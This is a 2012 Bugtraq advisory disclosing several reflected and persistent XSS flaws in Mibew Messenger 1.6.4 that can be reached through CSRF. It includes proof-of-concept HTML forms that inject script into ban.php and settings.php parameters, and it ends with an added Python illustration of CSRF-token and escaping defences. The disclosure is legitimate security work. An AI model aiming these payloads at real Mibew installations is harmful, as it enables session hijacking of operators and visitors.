
List:       bugtraq
Subject:    Mibew messenger multiple XSS
From:       Filippo Cavallarin <filippo.cavallarin () codseq ! it>
Date:       2012-01-30 12:27:12
Message-ID: D7AD2BDD-31B7-4AFB-A599-229B4478B225 () codseq ! it

Advisory ID:	CSA-12001
Title:	Mibew messenger multiple XSS
Product:	mibew messenger
Version:	1.6.4 and probably prior
Vendor:	mibew.org
Vulnerability type:	XSS
Vendor notification:	2012-01-07
Public disclosure:	2012-01-24


Mibew messenger version 1.6.4 and probably below is vulnerable to multiple XSS (reflected and persistent). All of the issues are reachable through POST requests and can be exploited because the affected endpoints lack CSRF protection.



1) Input passed via the "address" and "threadid" POST parameters to /operator/ban.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.


2) Input passed via the "geolinkparams" POST parameter to /operator/settings.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.


3) Input passed via the "title" POST parameter to /operator/settings.php is not properly sanitised before being saved to the database. This input is returned to the Operator user without any check when a new chat window is opened.


4) Input passed via the "chattitle" POST parameter to /operator/settings.php is not properly sanitised before being saved to the database. This input is returned to the Visitor user without any check when a new chat window is opened.



The following PoC code is available:

BOF
<form method=post action="http://127.0.0.1/mibew164/operator/ban.php">
<input type=hidden name="address" value='codseq'>
<input type=hidden name="days" value="1">
<input type=hidden name="threadid" value='1"><script>alert(1)</script>'>
<input type=hidden name="comment" value="dasd">

<input type=submit value="exploit ban.php threadid - execute me twice">
</form>



<form method=post action="http://127.0.0.1/mibew164/operator/ban.php">
<input type=hidden name="address" value='codseq1"><script>alert(1)</script>'>
<input type=hidden name="days" value="1">
<input type=hidden name="comment" value="dasd">
<input type=hidden name="threadid" value='1'>

<input type=submit value="exploit ban.php address">
</form>



<form method=post action="http://127.0.0.1/mibew164/operator/settings.php">
<input type=hidden name="email" value='prova@prova.com'>
<input type=hidden name="title" value='bla bla bla'>
<input type=hidden name="logo" value='1'>
<input type=hidden name="hosturl" value='1'>
<input type=hidden name="usernamepattern" value='a'>
<input type=hidden name="chattitle" value='a'>
<input type=hidden name="geolink" value='a'>
<input type=hidden name="sendmessagekey" value='enter'>
<input type=hidden name="geolinkparams" value='<script>alert(1)</script>'>

<input type=submit value="exploit settings.php geolinkparams">
</form>


<!-- this set a persistent XSS that gets executed when OPERATOR opens a new chat -->

<form method=post action="http://127.0.0.1/mibew164/operator/settings.php">
<input type=hidden name="email" value='prova@prova.com'>
<input type=hidden name="title" value='<script>alert(1)</script>'>
<input type=hidden name="logo" value='1'>
<input type=hidden name="hosturl" value='1'>
<input type=hidden name="usernamepattern" value='a'>
<input type=hidden name="chattitle" value='a'>
<input type=hidden name="geolink" value='a'>
<input type=hidden name="sendmessagekey" value='enter'>
<input type=hidden name="geolinkparams" value=''>

<input type=submit value="exploit settings.php title">
</form>


<!-- this set a persistent XSS that gets executed when VISITOR opens a new chat -->

<form method=post action="http://127.0.0.1/mibew164/operator/settings.php">
<input type=hidden name="email" value='prova@prova.com'>
<input type=hidden name="title" value='prova'>
<input type=hidden name="logo" value='1'>
<input type=hidden name="hosturl" value='1'>
<input type=hidden name="usernamepattern" value='a'>
<input type=hidden name="chattitle" value='<script>alert(1)</script>'>
<input type=hidden name="geolink" value='a'>
<input type=hidden name="sendmessagekey" value='enter'>
<input type=hidden name="geolinkparams" value=''>

<input type=submit value="exploit settings.php chattitle">
</form>


EOF
Solution

no solutions available yet
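Added illustration, not part of the advisory or of Mibew's code: a minimal Python model of the two controls the findings above call for, a per-session anti-CSRF token checked on every POST, and context-aware HTML escaping applied at output time for the reflected ban.php values and the stored settings.php values. All function names, the session store and the settings dictionary are hypothetical stand-ins.

```python
import hmac
import html
import secrets

# Constructed stand-in for the persisted operator settings row.
SETTINGS = {"title": "Mibew", "chattitle": "Live chat", "geolinkparams": ""}

def new_session():
    """Issue a random anti-CSRF token bound to the operator session (hypothetical)."""
    return {"csrf": secrets.token_hex(16)}

def csrf_ok(session, form):
    """True only if the POST carries the session's token; constant-time compare."""
    return hmac.compare_digest(form.get("csrf", ""), session["csrf"])

def attr(value):
    """Escape for a double-quoted attribute so a value like 1"><script> stays inert."""
    return html.escape(str(value), quote=True)

def handle_ban(session, form):
    """Model of ban.php: refuse forged POSTs, then reflect the fields escaped."""
    if not csrf_ok(session, form):
        return (403, "")
    body = (f'<input name="address" value="{attr(form.get("address", ""))}">'
            f'<input name="threadid" value="{attr(form.get("threadid", ""))}">')
    return (200, body)

def handle_settings(session, form, settings=SETTINGS):
    """Model of settings.php: CSRF check, store raw values, escape on output."""
    if not csrf_ok(session, form):
        return (403, "")
    for key in ("title", "chattitle", "geolinkparams"):
        if key in form:
            settings[key] = form[key]      # raw in the database, escaped when rendered
    return (200, f'<input name="geolinkparams" value="{attr(settings["geolinkparams"])}">')

def render_chat_window(settings=SETTINGS, for_operator=True):
    """Chat window for operator ('title') or visitor ('chattitle'), escaped at output."""
    key = "title" if for_operator else "chattitle"
    return f"<title>{html.escape(settings[key])}</title>"
```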



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it


